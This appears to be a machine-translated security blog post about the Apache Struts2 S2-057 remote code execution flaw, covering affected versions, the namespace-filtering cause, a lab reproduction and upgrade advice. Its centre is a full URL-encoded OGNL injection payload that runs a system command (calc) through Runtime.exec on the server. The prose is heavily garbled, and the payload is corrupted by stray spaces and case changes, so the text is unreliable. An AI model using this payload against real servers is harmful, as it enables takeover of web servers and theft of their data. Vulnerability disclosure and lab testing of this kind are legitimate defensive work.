s2-057 vulnerability, was exposed on August 22, 2018, the Struts2 057 flaw in the remote execution system commands, especially the use of Linux system, Apache environment, the impact of a large scope, high harm, if the XXX by the use of direct access to the server administrator rights, Web site data is tampered with and database theft occurs.
At present we sine security to the s2-057 vulnerability test, found that the affected version is Apache Struts 2.3–apachestruts2.3.34, Apache struts2.5–apache Struts2.5.16 series version. The official Apache has urgently fixed the s2-057 bug.
Through foreign exposure of the loophole POC, we introduce the next Struts2 vulnerability to how to use:
s2-057 vulnerability generated in the Web site configuration XML, there is a namespace value, the value does not do a detailed security filtering results can be written to the XML, especially the URL tag value is not a wildcard filter, resulting in the ability to execute remote code, as well as system commands to the server system.
We first set up a struts2 environment, find a Windows Server, use one-click Deployment Tools to deploy a test environment, Vulhub environment is also set up as follows:
The following is the process of exploiting and reproducing Struts2 vulnerabilities:
Visit website 192.168.0.3:7080/struts2/${(sine+sine)}/actionchain.action
Change the contents of ${(Sine+sine)} to exp,exp content as follows:
%24%7b (%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%23a%3d%40java.lang.runtime%40getruntime () . EXEC (%27calc%27). getInputStream ()%2c%23b%3dnew+java.io.inputstreamreader (%23a)%2c%23c%3dnew++ Java.io.BufferedReader (%23b)%2c%23d%3dnew+char%5b51020%5d%2c%23c.read (%23d)%2c%23jas502n%3d+% 40org.apache.struts2.servletactioncontext%40getresponse (). Getwriter ()%2c%23jas502n.println (%23d+)%2c% 23jas502n.close ())%7d/actionchain.action
Copy the exp content to the browser execution and discover that the server will run the calculator directly such as:
s2-057 Bug Fix Recommendations:
Upgrade to the latest version of Apache struts 2.3.35 or the latest version of Apache struts 2.5.17, directly upgrade can be officially done by the bug patch, fully compatible.
Website Apache Environment s2-057 exploit POC Remote execution Command Vulnerability replication